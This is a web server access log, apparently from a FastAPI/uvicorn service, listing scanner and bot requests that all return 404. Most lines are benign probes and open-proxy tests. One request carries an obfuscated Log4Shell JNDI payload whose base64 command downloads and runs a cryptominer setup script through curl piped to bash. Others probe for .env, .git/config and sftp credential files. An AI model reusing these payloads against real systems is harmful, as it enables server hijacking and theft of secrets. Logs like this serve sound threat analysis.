WARNING: Invalid HTTP request received.
INFO: 74.82.47.5:59374 - "GET / HTTP/1.1" 404 Not Found
INFO: 74.82.47.5:36568 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 74.82.47.5:22818 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
INFO: 74.82.47.5:22834 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
INFO: 185.216.140.186:39202 - "GET http%3A//pingjs.qq.com/ping.js HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 113.141.84.160:46762 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 172.206.143.215:52262 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 65.49.20.66:32032 - "GET / HTTP/1.1" 404 Not Found
INFO: 65.49.20.66:11880 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 65.49.20.66:8166 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
INFO: 65.49.20.66:8170 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
INFO: 125.36.252.182:35210 - "HEAD http%3A//110.242.68.4/ HTTP/1.1" 404 Not Found
INFO: 183.93.85.22:45035 - "GET http%3A//www.wujieliulan.com/ HTTP/1.1" 404 Not Found
INFO: 183.93.85.22:63911 - "CONNECT www.baidu.com%3A443 HTTP/1.1" 404 Not Found
INFO: 183.93.85.22:56321 - "GET http%3A//www.rfa.org/english/ HTTP/1.1" 404 Not Found
INFO: 183.93.85.22:49588 - "CONNECT cn.bing.com%3A443 HTTP/1.1" 404 Not Found
INFO: 183.93.85.22:20626 - "GET http%3A//dongtaiwang.com/ HTTP/1.1" 404 Not Found
INFO: 183.93.85.22:18861 - "CONNECT www.voanews.com%3A443 HTTP/1.1" 404 Not Found
INFO: 121.29.178.42:41815 - "GET http%3A//www.epochtimes.com/ HTTP/1.1" 404 Not Found
INFO: 121.29.178.42:58806 - "CONNECT www.so.com%3A443 HTTP/1.1" 404 Not Found
INFO: 121.29.178.42:22055 - "GET http%3A//www.soso.com/ HTTP/1.1" 404 Not Found
INFO: 121.29.178.42:15541 - "GET http%3A//www.minghui.org/ HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 206.168.34.36:50306 - "GET / HTTP/1.1" 404 Not Found
INFO: 206.168.34.36:50314 - "PRI %2A HTTP/2.0" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 185.191.126.248:59964 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 223.113.128.158:50058 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 185.191.126.248:35796 - "GET / HTTP/1.1" 404 Not Found
INFO: 52.81.237.92:54862 - "GET / HTTP/1.1" 404 Not Found
INFO: 52.81.237.92:54864 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 52.81.237.92:54884 - "GET /sitemap.xml HTTP/1.1" 404 Not Found
INFO: 52.81.237.92:54874 - "GET /robots.txt HTTP/1.1" 404 Not Found
INFO: 162.243.8.38:44506 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 64.62.197.214:16647 - "GET / HTTP/1.1" 404 Not Found
INFO: 64.62.197.223:22653 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 64.62.197.221:26687 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
INFO: 64.62.197.214:2107 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 124.70.63.89:57249 - "HEAD / HTTP/1.1" 404 Not Found
INFO: 124.70.63.89:18564 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 221.3.24.185:64663 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 106.75.189.197:40002 - "POST /token HTTP/1.1" 404 Not Found
INFO: 185.191.126.248:39220 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 113.141.85.252:58036 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 103.203.58.4:47208 - "GET / HTTP/1.1" 404 Not Found
INFO: 2.57.122.207:42128 - "GET / HTTP/1.1" 404 Not Found
INFO: 2.57.122.207:42128 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 162.142.125.37:35894 - "GET / HTTP/1.1" 404 Not Found
INFO: 162.142.125.37:35908 - "PRI %2A HTTP/2.0" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 206.168.34.121:38726 - "GET / HTTP/1.1" 404 Not Found
INFO: 206.168.34.121:38738 - "PRI %2A HTTP/2.0" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 206.168.34.42:34776 - "GET / HTTP/1.1" 404 Not Found
INFO: 206.168.34.42:54344 - "PRI %2A HTTP/2.0" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 87.236.176.211:56241 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 64.62.156.14:6981 - "GET / HTTP/1.1" 404 Not Found
INFO: 64.62.156.21:38001 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 64.62.156.17:47719 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
INFO: 64.62.156.19:24409 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 31.13.224.51:36814 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 120.46.16.109:30384 - "HEAD / HTTP/1.1" 404 Not Found
INFO: 120.46.16.109:16930 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 123.249.108.188:43694 - "GET / HTTP/1.1" 404 Not Found
INFO: 185.191.126.248:56286 - "GET / HTTP/1.1" 404 Not Found
INFO: 184.105.139.70:59608 - "GET / HTTP/1.1" 404 Not Found
INFO: 184.105.139.70:54880 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 184.105.139.70:54884 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
INFO: 184.105.139.70:65464 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 185.191.126.248:34390 - "GET / HTTP/1.1" 404 Not Found
INFO: 185.216.140.186:55756 - "GET http%3A//pingjs.qq.com/ping.js HTTP/1.1" 404 Not Found
INFO: 124.70.90.23:52356 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 36.41.68.61:44290 - "GET / HTTP/1.1" 404 Not Found
INFO: 13.64.193.117:47282 - "GET / HTTP/1.1" 404 Not Found
INFO: 185.216.140.186:59794 - "GET http%3A//pingjs.qq.com/ping.js HTTP/1.1" 404 Not Found
INFO: 162.142.125.33:47956 - "GET / HTTP/1.1" 404 Not Found
INFO: 162.142.125.33:47972 - "PRI %2A HTTP/2.0" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 159.65.236.96:54972 - "GET / HTTP/1.1" 404 Not Found
INFO: 123.145.33.216:17362 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 5.135.58.198:44397 - "GET / HTTP/1.1" 404 Not Found
INFO: 178.32.72.218:47617 - "GET /favicon.ico HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 60.191.20.210:43456 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 184.105.247.195:24312 - "GET / HTTP/1.1" 404 Not Found
INFO: 184.105.247.195:18346 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 184.105.247.195:18362 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
INFO: 184.105.247.195:18378 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
INFO: 80.75.212.9:36590 - "CONNECT api.ip.pn%3A443 HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 185.191.126.248:33458 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 185.91.127.9:43792 - "GET /t%28%27%24%7B%24%7Benv%3ANaN%3A-j%7Dndi%24%7Benv%3ANaN%3A-%3A%7D%24%7Benv%3ANaN%3A-l%7Ddap%24%7Benv%3ANaN%3A-%3A%7D//89.34.230.11%3A3306/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vQzNQb29sL3htcmlnX3NldHVwL21hc3Rlci9zZXR1cF9jM3Bvb2xfbWluZXIuc2ggfCBiYXNoIC1zIDQ4Nnhxdzd5c1hkS3c3UmtWelQ1dGRTaUR0RTZzb3hVZFlhR2FHRTFHb2FDZHZCRjdyVmc1b01YTDlwRngzckIxV1VDWnJKdmQ2QUhNRldpcGVZdDVlRk5VeDlwbUdO%7D%27%29 HTTP/1.1" 404 Not Found
INFO: 185.91.127.43:34340 - "CONNECT api.ip.pn%3A443 HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 185.191.126.248:47662 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 1.94.195.230:27084 - "HEAD / HTTP/1.1" 404 Not Found
INFO: 1.94.195.230:52315 - "GET / HTTP/1.1" 404 Not Found
INFO: 185.216.140.186:37086 - "GET http%3A//pingjs.qq.com/ping.js HTTP/1.1" 404 Not Found
INFO: 87.236.176.221:52211 - "GET / HTTP/1.1" 404 Not Found
INFO: 206.168.34.206:59698 - "GET / HTTP/1.1" 404 Not Found
INFO: 206.168.34.206:59708 - "PRI %2A HTTP/2.0" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 80.75.212.9:43956 - "CONNECT api.ip.pn%3A443 HTTP/1.1" 404 Not Found
INFO: 64.62.197.80:52199 - "GET / HTTP/1.1" 404 Not Found
INFO: 64.62.197.81:37671 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 64.62.197.89:8367 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
INFO: 64.62.197.81:27717 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 152.32.135.214:45910 - "GET / HTTP/1.1" 404 Not Found
INFO: 152.32.135.214:39902 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 152.32.135.214:39908 - "GET /robots.txt HTTP/1.1" 404 Not Found
INFO: 152.32.135.214:39912 - "GET /sitemap.xml HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 185.191.126.248:51164 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 120.46.16.109:25305 - "HEAD /sitemap.xml HTTP/1.1" 404 Not Found
INFO: 120.46.16.109:57264 - "GET /sitemap.xml HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 154.212.141.151:56762 - "GET / HTTP/1.1" 404 Not Found
INFO: 185.191.126.248:44644 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 64.62.197.165:56651 - "GET / HTTP/1.1" 404 Not Found
INFO: 64.62.197.152:10483 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 64.62.197.160:50057 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
INFO: 64.62.197.161:40701 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 138.197.191.87:39360 - "GET / HTTP/1.1" 404 Not Found
ERROR: Exception in ASGI application
Traceback (most recent call last):
File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/uvicorn/protocols/http/h11_impl.py", line 407, in run_asgi
result = await app( # type: ignore[func-returns-value]
File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/uvicorn/middleware/proxy_headers.py", line 69, in __call__
return await self.app(scope, receive, send)
File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/fastapi/applications.py", line 1054, in __call__
await super().__call__(scope, receive, send)
File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/starlette/applications.py", line 123, in __call__
await self.middleware_stack(scope, receive, send)
File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/starlette/middleware/errors.py", line 186, in __call__
raise exc
File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/starlette/middleware/errors.py", line 164, in __call__
await self.app(scope, receive, _send)
File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/starlette/middleware/exceptions.py", line 65, in __call__
await wrap_app_handling_exceptions(self.app, conn)(scope, receive, send)
File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/starlette/_exception_handler.py", line 78, in wrapped_app
await response(scope, receive, sender)
File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/starlette/responses.py", line 152, in __call__
await send(
File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/starlette/_exception_handler.py", line 50, in sender
await send(message)
File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/starlette/middleware/errors.py", line 161, in _send
await send(message)
File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/uvicorn/protocols/http/h11_impl.py", line 489, in send
output = self.conn.send(event=response)
File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/h11/_connection.py", line 512, in send
data_list = self.send_with_data_passthrough(event)
File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/h11/_connection.py", line 537, in send_with_data_passthrough
self._process_event(self.our_role, event)
File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/h11/_connection.py", line 272, in _process_event
self._cstate.process_event(role, type(event), server_switch_event)
File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/h11/_state.py", line 293, in process_event
self._fire_event_triggered_transitions(role, _event_type)
File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/h11/_state.py", line 311, in _fire_event_triggered_transitions
raise LocalProtocolError(
h11._util.LocalProtocolError: can't handle event type Response when role=SERVER and state=MUST_CLOSE
INFO: 138.197.191.87:39362 - "GET / HTTP/1.1" 404 Not Found
INFO: 138.197.191.87:49354 - "GET /server HTTP/1.1" 404 Not Found
INFO: 138.197.191.87:49358 - "GET /version HTTP/1.1" 404 Not Found
INFO: 138.197.191.87:49374 - "GET /.vscode/sftp.json HTTP/1.1" 404 Not Found
INFO: 138.197.191.87:49388 - "GET /about HTTP/1.1" 404 Not Found
INFO: 138.197.191.87:49394 - "GET /debug/default/view?panel=config HTTP/1.1" 404 Not Found
INFO: 138.197.191.87:49404 - "GET /v2/_catalog HTTP/1.1" 404 Not Found
INFO: 138.197.191.87:49416 - "GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 404 Not Found
INFO: 138.197.191.87:49430 - "GET /server-status HTTP/1.1" 404 Not Found
INFO: 138.197.191.87:49442 - "GET /_all_dbs HTTP/1.1" 404 Not Found
INFO: 138.197.191.87:49446 - "GET /.DS_Store HTTP/1.1" 404 Not Found
INFO: 138.197.191.87:36216 - "GET /.env HTTP/1.1" 404 Not Found
INFO: 138.197.191.87:36226 - "GET /.git/config HTTP/1.1" 404 Not Found
INFO: 138.197.191.87:36240 - "GET /s/330313e20363e24393e213/_/%3B/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1" 404 Not Found
INFO: 138.197.191.87:36252 - "GET /config.json HTTP/1.1" 404 Not Found
INFO: 138.197.191.87:36262 - "GET /telescope/requests HTTP/1.1" 404 Not Found
INFO: 138.197.191.87:36272 - "GET /?rest_route=/wp/v2/users/ HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 1.92.159.135:44049 - "HEAD /config.json HTTP/1.1" 404 Not Found
INFO: 1.92.159.135:35640 - "GET /config.json HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 1.94.195.230:31877 - "HEAD /.vscode/sftp.json HTTP/1.1" 404 Not Found
INFO: 1.94.195.230:18422 - "GET /.vscode/sftp.json HTTP/1.1" 404 Not Found
INFO: 42.63.124.88:16626 - "GET / HTTP/1.1" 404 Not Found
INFO: 1.83.125.97:13483 - "GET / HTTP/1.1" 404 Not Found
INFO: 183.160.194.117:4463 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 45.207.223.44:53774 - "GET / HTTP/1.1" 404 Not Found
INFO: 45.207.223.44:53788 - "GET / HTTP/1.1" 404 Not Found
INFO: 45.207.223.44:53802 - "GET / HTTP/1.1" 404 Not Found
INFO: 45.207.223.44:53812 - "GET / HTTP/1.1" 404 Not Found
INFO: 45.207.223.44:53824 - "GET /login.rsp HTTP/1.1" 404 Not Found
INFO: 45.207.223.44:51720 - "GET /nobody/favicon.ico HTTP/1.1" 404 Not Found
INFO: 45.207.223.44:51724 - "GET / HTTP/1.1" 404 Not Found
INFO: 45.207.223.44:38120 - "GET / HTTP/1.1" 404 Not Found
INFO: 45.207.223.44:38128 - "GET / HTTP/1.1" 404 Not Found
INFO: 45.207.223.44:38138 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 45.207.223.44:52270 - "GET / HTTP/1.1" 404 Not Found
INFO: 45.207.223.44:52280 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 45.207.223.44:52286 - "GET / HTTP/1.1" 404 Not Found
INFO: 45.207.223.44:52296 - "GET / HTTP/1.1" 404 Not Found
INFO: 45.207.223.44:37634 - "GET / HTTP/1.1" 404 Not Found
INFO: 45.207.223.44:37636 - "GET / HTTP/1.1" 404 Not Found
INFO: 45.207.223.44:37638 - "GET / HTTP/1.1" 404 Not Found
INFO: 45.207.223.44:53680 - "GET / HTTP/1.1" 404 Not Found
INFO: 45.207.223.44:53686 - "GET / HTTP/1.1" 404 Not Found
INFO: 45.207.223.44:53692 - "GET / HTTP/1.1" 404 Not Found
INFO: 45.207.223.44:53696 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 45.207.223.44:48892 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 45.207.223.44:48900 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 45.207.223.44:48904 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 45.207.223.44:48914 - "GET /image/lgbg.jpg HTTP/1.1" 404 Not Found
INFO: 45.207.223.44:47014 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 45.207.223.44:47016 - "GET / HTTP/1.1" 404 Not Found
INFO: 45.207.223.44:47026 - "GET / HTTP/1.1" 404 Not Found
INFO: 45.207.223.44:47034 - "GET / HTTP/1.1" 404 Not Found
INFO: 45.207.223.44:38420 - "GET / HTTP/1.1" 404 Not Found
INFO: 45.207.223.44:56652 - "GET / HTTP/1.1" 404 Not Found
INFO: 45.207.223.44:56662 - "GET / HTTP/1.1" 404 Not Found
INFO: 45.207.223.44:42704 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 123.249.105.139:30528 - "HEAD /image/lgbg.jpg HTTP/1.1" 404 Not Found
INFO: 123.249.105.139:62486 - "GET /image/lgbg.jpg HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 124.70.63.89:27278 - "HEAD / HTTP/1.1" 404 Not Found
INFO: 124.70.63.89:62601 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 1.92.159.135:25603 - "HEAD / HTTP/1.1" 404 Not Found
INFO: 1.92.159.135:39062 - "GET / HTTP/1.1" 404 Not Found
INFO: 119.23.241.9:39090 - "GET / HTTP/1.1" 404 Not Found
INFO: 119.23.241.9:39118 - "GET /lang/CN.txt HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 172.169.4.170:54810 - "GET / HTTP/1.1" 404 Not Found
INFO: 185.191.126.248:38808 - "GET / HTTP/1.1" 404 Not Found
INFO: 162.142.125.194:53228 - "GET / HTTP/1.1" 404 Not Found
INFO: 162.142.125.194:53238 - "PRI %2A HTTP/2.0" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 173.230.135.6:49676 - "GET / HTTP/1.0" 404 Not Found
INFO: 135.148.63.215:40035 - "GET / HTTP/1.1" 404 Not Found
INFO: 51.81.181.175:37407 - "GET /favicon.ico HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 64.62.156.89:59349 - "GET / HTTP/1.1" 404 Not Found
INFO: 64.62.156.88:55637 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 64.62.156.85:58053 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
INFO: 64.62.156.87:5115 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 87.236.176.226:49403 - "GET / HTTP/1.1" 404 Not Found
INFO: 185.191.126.248:54802 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 64.62.197.168:52085 - "GET / HTTP/1.1" 404 Not Found
INFO: 64.62.197.178:24179 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 64.62.197.179:52289 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
INFO: 64.62.197.169:64257 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 185.216.140.186:60346 - "GET http%3A//pingjs.qq.com/ping.js HTTP/1.1" 404 Not Found
INFO: 167.94.138.34:46446 - "GET / HTTP/1.1" 404 Not Found
INFO: 167.94.138.34:46456 - "PRI %2A HTTP/2.0" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 185.191.126.248:37700 - "GET / HTTP/1.1" 404 Not Found
INFO: 134.209.10.97:46074 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 223.113.128.164:47694 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 70.39.75.167:49148 - "GET / HTTP/1.1" 404 Not Found
INFO: 64.62.156.106:20829 - "GET / HTTP/1.1" 404 Not Found
INFO: 64.62.156.107:28619 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 64.62.156.107:43499 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
INFO: 64.62.156.97:12331 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
INFO: 52.80.18.29:48530 - "GET / HTTP/1.1" 404 Not Found
INFO: 52.80.18.29:48546 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 52.80.18.29:48570 - "GET /sitemap.xml HTTP/1.1" 404 Not Found
INFO: 52.80.18.29:48554 - "GET /robots.txt HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 124.70.57.132:34056 - "HEAD / HTTP/1.1" 404 Not Found
INFO: 124.70.57.132:22282 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 39.105.169.144:41754 - "GET / HTTP/1.1" 404 Not Found
INFO: 39.105.169.144:43626 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 185.191.126.248:59862 - "GET / HTTP/1.1" 404 Not Found
INFO: 65.49.20.69:33260 - "GET / HTTP/1.1" 404 Not Found
INFO: 65.49.20.69:48986 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 65.49.20.69:49002 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
INFO: 65.49.20.69:49010 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
INFO: 13.64.109.8:36270 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 120.46.90.142:45574 - "HEAD / HTTP/1.1" 404 Not Found
INFO: 120.46.90.142:23709 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 124.70.25.74:13545 - "HEAD / HTTP/1.1" 404 Not Found
INFO: 124.70.25.74:28683 - "GET / HTTP/1.1" 404 Not Found
INFO: 124.70.25.74:28683 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 206.168.34.40:35806 - "GET / HTTP/1.1" 404 Not Found
INFO: 206.168.34.40:35818 - "PRI %2A HTTP/2.0" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 27.115.124.101:46757 - "GET / HTTP/1.1" 404 Not Found
INFO: 27.115.124.101:46757 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 185.226.197.63:57255 - "GET / HTTP/1.1" 404 Not Found
INFO: 185.226.197.63:34425 - "GET /console HTTP/1.1" 404 Not Found
INFO: 185.226.197.64:37409 - "GET /showLogin.cc HTTP/1.1" 404 Not Found
INFO: 87.236.176.94:57835 - "GET / HTTP/1.1" 404 Not Found
INFO: 18.144.4.34:39516 - "GET / HTTP/1.1" 404 Not Found
INFO: 185.216.140.186:33568 - "GET http%3A//pingjs.qq.com/ping.js HTTP/1.1" 404 Not Found
INFO: 106.75.188.200:37598 - "POST /token HTTP/1.1" 404 Not Found
INFO: 157.245.69.67:34548 - "GET /aaa9 HTTP/1.1" 404 Not Found
INFO: 157.245.69.67:34552 - "GET /aab8 HTTP/1.1" 404 Not Found
INFO: 157.245.69.67:42104 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 89.248.172.41:56854 - "HEAD /playlist.m3u HTTP/1.1" 404 Not Found
INFO: 65.49.20.66:13626 - "GET / HTTP/1.1" 404 Not Found
INFO: 65.49.20.66:15908 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 65.49.20.66:15922 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
INFO: 65.49.20.66:15926 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
INFO: 103.203.58.4:41010 - "GET / HTTP/1.1" 404 Not Found
INFO: 80.82.77.139:49396 - "GET / HTTP/1.1" 404 Not Found
INFO: 80.82.77.139:50230 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 185.191.126.248:40242 - "GET / HTTP/1.1" 404 Not Found
INFO: 70.39.75.159:34126 - "GET / HTTP/1.1" 404 Not Found
INFO: 185.191.126.248:59652 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 206.168.34.220:36530 - "GET / HTTP/1.1" 404 Not Found
INFO: 206.168.34.220:36552 - "PRI %2A HTTP/2.0" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 1.94.195.230:25149 - "HEAD / HTTP/1.1" 404 Not Found
INFO: 1.94.195.230:35249 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 34.140.231.8:38328 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 143.244.133.204:60510 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 36.111.151.242:59402 - "GET / HTTP/1.1" 404 Not Found
INFO: 36.111.151.242:58560 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 36.111.151.242:58564 - "GET /robots.txt HTTP/1.1" 404 Not Found
INFO: 36.111.151.242:58578 - "GET /sitemap.xml HTTP/1.1" 404 Not Found
INFO: 124.70.90.23:39065 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 64.62.156.111:30617 - "GET / HTTP/1.1" 404 Not Found
INFO: 64.62.156.111:35591 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 64.62.156.118:17357 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
